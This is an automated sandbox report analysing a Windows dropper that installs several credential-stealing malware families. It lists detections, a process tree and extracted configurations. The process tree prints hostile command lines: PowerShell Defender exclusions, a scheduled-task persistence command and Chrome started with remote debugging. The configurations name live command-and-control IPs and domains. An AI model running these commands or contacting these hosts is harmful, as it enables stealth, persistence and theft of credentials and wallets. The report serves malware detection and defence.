Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Tii6ue74NB.exe

Overview

General Information

Sample name:Tii6ue74NB.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:da05563897f4d6dc3e18c20da49078f103dbeee1c8ba9ddd01e7e7d8b0077fca
Analysis ID:1578280
MD5:61fd8b1c2c9984f10c6b263504f6e794
SHA1:f69d67ce66a80d1dcd0e5e634fcc3f8cc9cf7339
SHA256:da05563897f4d6dc3e18c20da49078f103dbeee1c8ba9ddd01e7e7d8b0077fca
Infos:

Detection

LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
Yara detected Stealc
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Leaks process information
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • Tii6ue74NB.exe (PID: 6868 cmdline: "C:\Users\user\Desktop\Tii6ue74NB.exe" MD5: 61FD8B1C2C9984F10C6B263504F6E794)
    • i9z22.exe (PID: 2304 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe MD5: C597FB849B6B2BB18895B7D0337644D7)
      • P0D95.exe (PID: 1020 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe MD5: B2F8BAD322CF8F7619A7C5FF151C984B)
        • 1I15f6.exe (PID: 744 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe MD5: EB5E8AF364226452A7B60CFDF34CE69B)
          • skotes.exe (PID: 6416 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: EB5E8AF364226452A7B60CFDF34CE69B)
            • 5813f66ed1.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe" MD5: FF279F4E5B1C6FBDA804D2437C2DBDC8)
            • 941d08ea4f.exe (PID: 6440 cmdline: "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe" MD5: 8A549F15D1418FB4207AADB4BA813A36)
              • chrome.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
                • chrome.exe (PID: 4632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2288,i,6769742919243767367,11351755421190753691,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • service123.exe (PID: 5932 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 8F8B80038AAA07D28149480E2229DB51)
              • schtasks.exe (PID: 8028 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
                • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WerFault.exe (PID: 1404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 1884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • fc1570cd0d.exe (PID: 8160 cmdline: "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe" MD5: EF08A45833A7D881C90DED1952F96CB4)
              • fc1570cd0d.exe (PID: 6708 cmdline: "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe" MD5: EF08A45833A7D881C90DED1952F96CB4)
            • ae64e67a81.exe (PID: 1664 cmdline: "C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe" MD5: 31093EBDC9EA634763874604C07E0F69)
              • svchost.exe (PID: 7824 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
              • WerFault.exe (PID: 7560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 872 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • 3800cab1bc.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe" MD5: 14BECDF1E2402E9AA6C2BE0E6167041E)
              • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 8056 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 5840 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • 7ab555facf.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
              • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • 7ab555facf.exe (PID: 5812 cmdline: "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
            • d689b693b2.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe" MD5: EBFE28CB77F3D1246693FA372420D022)
            • d0b5a60121.exe (PID: 4484 cmdline: "C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
              • cmd.exe (PID: 1628 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 3828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 2i7672.exe (PID: 6896 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe MD5: C55AABF570C84E3060DF0D997F2BFB33)
      • 3m20j.exe (PID: 5932 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe MD5: 527B76DD8DE1219705E08C1B7201AE32)
        • chrome.exe (PID: 7260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,9356535502589347400,8547874231582347487,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 7512 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HIDGCFBFBF.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • HIDGCFBFBF.exe (PID: 7732 cmdline: "C:\Users\user\Documents\HIDGCFBFBF.exe" MD5: EB5E8AF364226452A7B60CFDF34CE69B)
  • rundll32.exe (PID: 4584 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 1020 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • skotes.exe (PID: 7768 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EB5E8AF364226452A7B60CFDF34CE69B)
  • skotes.exe (PID: 8164 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EB5E8AF364226452A7B60CFDF34CE69B)
  • service123.exe (PID: 4144 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 8F8B80038AAA07D28149480E2229DB51)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["cheapptaxysu.click", "sustainskelet.lat", "discokeyus.lat", "energyaffai.lat", "crosshuaht.lat", "necklacebudi.lat", "grannyejh.lat", "aspecteirs.lat", "rapeflowwj.lat"], "Build id": "api--"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_CryptbotYara detected CryptbotJoe Security
    dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000023.00000003.2623844252.0000000001038000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000018.00000003.2397272020.0000000005290000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000023.00000003.2626627221.0000000001038000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000020.00000003.2472589310.00000000052D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000003.00000003.1853056053.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    Click to see the 47 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    18.2.fc1570cd0d.exe.38ad790.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      19.3.ae64e67a81.exe.5360000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        20.3.svchost.exe.54a0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                          18.2.fc1570cd0d.exe.5160000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                            19.3.ae64e67a81.exe.5140000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              Click to see the 7 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe, ParentProcessId: 7772, ParentProcessName: 3800cab1bc.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", ProcessId: 8056, ProcessName: powershell.exe
                              Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe, ParentProcessId: 6440, ParentProcessName: 941d08ea4f.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 8028, ProcessName: schtasks.exe
                              Sigma detected: Browser Started with Remote Debugging
                              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe, ParentImage: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe, ParentProcessId: 5932, ParentProcessName: 3m20j.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7260, ProcessName: chrome.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe, ParentProcessId: 7772, ParentProcessName: 3800cab1bc.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", ProcessId: 8056, ProcessName: powershell.exe
                              Sigma detected: Suspicious Add Scheduled Task Parent
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe, ParentProcessId: 6440, ParentProcessName: 941d08ea4f.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 8028, ProcessName: schtasks.exe
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe, ParentProcessId: 6440, ParentProcessName: 941d08ea4f.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 8028, ProcessName: schtasks.exe
                              Sigma detected: Uncommon Svchost Parent Process
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe, ParentProcessId: 1664, ParentProcessName: ae64e67a81.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7824, ProcessName: svchost.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Tii6ue74NB.exe, ProcessId: 6868, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe, ParentProcessId: 7772, ParentProcessName: 3800cab1bc.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx", ProcessId: 8056, ProcessName: powershell.exe
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe, ParentProcessId: 1664, ParentProcessName: ae64e67a81.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7824, ProcessName: svchost.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-19T14:20:18.745239+010020283713Unknown Traffic192.168.2.449731104.21.64.80443TCP
                              2024-12-19T14:20:20.560952+010020283713Unknown Traffic192.168.2.449733104.21.64.80443TCP
                              2024-12-19T14:20:30.609376+010020283713Unknown Traffic192.168.2.449742104.21.67.146443TCP
                              2024-12-19T14:20:32.531147+010020283713Unknown Traffic192.168.2.449745104.21.67.146443TCP
                              2024-12-19T14:20:37.120524+010020283713Unknown Traffic192.168.2.449755104.21.67.146443TCP
                              2024-12-19T14:20:39.805617+010020283713Unknown Traffic192.168.2.449762104.21.67.146443TCP
                              2024-12-19T14:20:42.313538+010020283713Unknown Traffic192.168.2.449767104.21.67.146443TCP
                              2024-12-19T14:20:44.882069+010020283713Unknown Traffic192.168.2.449773104.21.67.146443TCP
                              2024-12-19T14:20:48.037128+010020283713Unknown Traffic192.168.2.449775104.21.67.146443TCP
                              2024-12-19T14:20:52.583026+010020283713Unknown Traffic192.168.2.449780104.21.67.146443TCP
                              2024-12-19T14:21:13.985297+010020283713Unknown Traffic192.168.2.449834104.21.64.80443TCP
                              2024-12-19T14:21:16.106715+010020283713Unknown Traffic192.168.2.449841104.21.64.80443TCP
                              2024-12-19T14:21:19.591163+010020283713Unknown Traffic192.168.2.449854104.21.64.80443TCP
                              2024-12-19T14:21:22.134347+010020283713Unknown Traffic192.168.2.449862104.21.64.80443TCP
                              2024-12-19T14:21:25.197121+010020283713Unknown Traffic192.168.2.449872104.21.64.80443TCP
                              2024-12-19T14:21:30.832098+010020283713Unknown Traffic192.168.2.449899104.21.64.80443TCP
                              2024-12-19T14:21:31.971712+010020283713Unknown Traffic192.168.2.449902104.21.66.85443TCP
                              2024-12-19T14:21:34.132800+010020283713Unknown Traffic192.168.2.449907104.21.64.80443TCP
